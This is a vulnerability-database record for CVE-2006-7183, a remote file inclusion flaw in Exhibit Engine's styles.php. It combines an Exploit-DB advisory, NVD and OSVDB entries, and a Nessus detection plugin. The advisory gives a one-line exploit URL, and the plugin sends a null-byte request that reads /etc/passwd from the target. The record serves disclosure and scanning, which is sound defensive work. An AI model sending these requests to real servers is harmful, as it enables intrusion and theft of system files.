{"id": "EDB-ID:2850", "type": "exploitdb", "bulletinFamily": "exploit", "title": "Exhibit Engine <= 1.22 styles.php Remote File Include Vulnerability", "description": "Exhibit Engine <= 1.22 (styles.php) Remote File Include Vulnerability. CVE-2006-7183. Webapps exploit for php platform", "published": "2006-11-25T00:00:00", "modified": "2006-11-25T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.exploit-db.com/exploits/2850/", "reporter": "Kacper", "references": [], "cvelist": ["CVE-2006-7183"], "lastseen": "2016-01-31T17:10:05", "viewCount": 9, "enchantments": {"score": {"value": 7.3, "vector": "NONE", "modified": "2016-01-31T17:10:05", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2006-7183"]}, {"type": "osvdb", "idList": ["OSVDB:34030"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:4841"]}, {"type": "nessus", "idList": ["EXHIBIT_ENGINE_RFI.NASL"]}], "modified": "2016-01-31T17:10:05", "rev": 2}, "vulnersScore": 7.3}, "sourceHref": "https://www.exploit-db.com/download/2850/", "sourceData": "$$$$$$$$$$$$$$$ DEVIL TEAM THE BEST POLISH TEAM $$$$$$$$$$$$$$$\n$$\n$$ Exhibit Engine <= 1.22 (toroot) Remote File Include Vulnerability\n$$ Script site: http://photography-on-the.net/ee/\n$$\n$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$\n$$\n$$ Find by: Kacper (a.k.a Rahim)\n$$\n$$ Contact: kacper1964@yahoo.pl or http://www.devilteam.yum.pl\n$$\n$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$\n$$\n$$ Greetz: DragonHeart, Satan, Leito, Leon, Luzak,\n$$ Adam, DeathSpeed, Drzewko, pepi\n$$\n$$ Specjal greetz: DragonHeart ;-)\n$$\n$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$\n\nExpl:\n\nhttp://www.site.com/[ee_path]/styles.php?toroot=[evil_scripts]\n\n#Pozdro dla wszystkich ;-)\n\n# milw0rm.com [2006-11-25]\n", "osvdbidlist": ["34030"]}

{"cve": [{"lastseen": "2020-12-09T19:23:51", "description": "PHP remote file inclusion vulnerability in styles.php in Exhibit Engine (EE) 1.22 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the toroot parameter.", "edition": 5, "cvss3": {}, "published": "2007-03-30T21:19:00", "title": "CVE-2006-7183", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": true, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2006-7183"], "modified": "2017-10-11T01:31:00", "cpe": ["cpe:/a:photography-on-the-net:exhibit_engine_2:1.22"], "id": "CVE-2006-7183", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-7183", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:photography-on-the-net:exhibit_engine_2:1.22:*:*:*:*:*:*:*"]}], "osvdb": [{"lastseen": "2017-04-28T13:20:30", "bulletinFamily": "software", "cvelist": ["CVE-2006-7183"], "description": "## Manual Testing Notes\nhttp://[target]/[ee_path]/styles.php?toroot=[evil_scripts]\n## References:\nISS X-Force ID: 30516\nGeneric Exploit URL: http://www.milw0rm.com/exploits/2850\n[CVE-2006-7183](https://vulners.com/cve/CVE-2006-7183)\nBugtraq ID: 21313\n", "edition": 1, "modified": "2006-11-25T22:46:45", "published": "2006-11-25T22:46:45", "href": "https://vulners.com/osvdb/OSVDB:34030", "id": "OSVDB:34030", "title": "Exhibit Engine styles.php toroot Variable Remote File Inclusion", "type": "osvdb", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "securityvulns": [{"lastseen": "2018-08-31T11:09:19", "bulletinFamily": "software", "cvelist": ["CVE-2006-7184", "CVE-2006-7183"], "description": "PHP inclusions, SQL injections, directory traversals, crossite scripting, etc.", "edition": 1, "modified": "2005-06-03T00:00:00", "published": "2005-06-03T00:00:00", "id": "SECURITYVULNS:VULN:4841", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:4841", "title": "PHP, ASP, CGI web applications security vulnerabilities", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "nessus": [{"lastseen": "2021-01-20T10:04:24", "description": "The remote web server is running Exhibit Engine, a PHP based photo\ngallery management system. \n\nThe version of Exhibit Engine installed on the remote host fails to\nsanitize input to the 'toroot' parameter before using it in the\n'styles.php' script to include PHP code. Provided PHP's\n'register_globals' setting is enabled, an unauthenticated attacker can\nexploit this issue to view arbitrary files and execute arbitrary code,\npossibly taken from third-party hosts, on the remote host.", "edition": 20, "published": "2006-11-14T00:00:00", "title": "Exhibit Engine styles.php toroot Parameter Remote File Inclusion", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-7184", "CVE-2006-7183"], "modified": "2006-11-14T00:00:00", "cpe": [], "id": "EXHIBIT_ENGINE_RFI.NASL", "href": "https://www.tenable.com/plugins/nessus/23640", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# This script was written by Justin Seitz <jms@bughunter.ca>\n#\tPer Justin : GPLv2\n#\n# Changes by Tenable:\n# - Revised plugin title (1/02/2009)\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif(description)\n{\n # set script identifiers\n\n script_id(23640);\n script_version(\"1.20\");\n\n script_cve_id(\"CVE-2006-7183\", \"CVE-2006-7184\");\n script_bugtraq_id(20793, 21313);\n\n script_name(english:\"Exhibit Engine styles.php toroot Parameter Remote File Inclusion\");\n summary[\"english\"] = \"Tries to read a local file with Exhibit Engine\";\n family[\"english\"] = \"CGI abuses\";\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server contains a PHP script that is affected by a\nremote file include issue.\" );\n script_set_attribute(attribute:\"description\", value:\n\"The remote web server is running Exhibit Engine, a PHP based photo\ngallery management system. \n\nThe version of Exhibit Engine installed on the remote host fails to\nsanitize input to the 'toroot' parameter before using it in the\n'styles.php' script to include PHP code. Provided PHP's\n'register_globals' setting is enabled, an unauthenticated attacker can\nexploit this issue to view arbitrary files and execute arbitrary code,\npossibly taken from third-party hosts, on the remote host.\" );\n script_set_attribute(attribute:\"solution\", value:\n\"No patches or upgrades have been reported by the vendor at this time.\" );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:W/RC:ND\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2006/11/14\");\n script_set_attribute(attribute:\"vuln_publication_date\", value: \"2006/11/26\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_end_attributes();\n\n script_summary(english:summary[\"english\"]);\n\n script_category(ACT_ATTACK);\n script_copyright(english:\"This script is Copyright (C) 2006-2021 Justin Seitz\");\n\n script_family(english:family[\"english\"]);\n\n script_dependencies(\"http_version.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n script_require_keys(\"www/PHP\");\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"data_protection.inc\");\n\nport = get_http_port(default:80, embedded:TRUE);\n\n#\n# verify we can talk to the web server, if not exit\n#\n\nif(!get_port_state(port)) exit(0);\nif(!can_host_php(port:port)) exit(0);\n\n#\n# create list of directories to scan\n#\n\n\n# Loop through directories.\nif (thorough_tests) dirs = list_uniq(make_list(\"/gallery\",\"/photos\",\"/images\",\"/exhibit\",\"/exhibitengine\",\"/ee\", cgi_dirs()));\nelse dirs = make_list(cgi_dirs());\n#\n# Iterate through the list\n#\n\nfile = \"/etc/passwd\";\n\nforeach dir (dirs) {\n\n#\n#\n# Attack: Attempt a remote file include of /etc/passwd\n#\n#\n attackreq = http_get(item:string(dir, \"/styles.php?toroot=\", file, \"%00\"),port:port);\n attackres = http_keepalive_send_recv(port:port, data:attackreq, bodyonly:TRUE);\n if (attackres == NULL) exit(0);\n\n if (egrep(pattern:\"root:.*:0:[01]:\", string:attackres) ||\n string(\"main(\", file, \"\\\\0styles/original.php): failed to open stream\") >< attackres ||\n string(\"main(\", file, \"): failed to open stream: No such file\") >< attackres ||\n \"open_basedir restriction in effect. File(\" >< attackres) {\n\n passwd = \"\";\n if (egrep(pattern:\"root:.*:0:[01]:\", string:attackres))\n passwd = attackres;\n\n if (passwd) {\n if (dir == \"\") dir = \"/\";\n passwd = data_protection::redact_etc_passwd(output:passwd);\n info = string(\"The version of Exhibit Engine installed in directory '\", dir, \"'\\n\",\n \"is vulnerable to this issue. Here are the contents of /etc/passwd\\n\",\n \"from the remote host :\\n\\n\", passwd);\n security_warning(port:port, extra: info);\n }\n else\n security_warning(port:port);\n\n exit(0);\n }\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}]}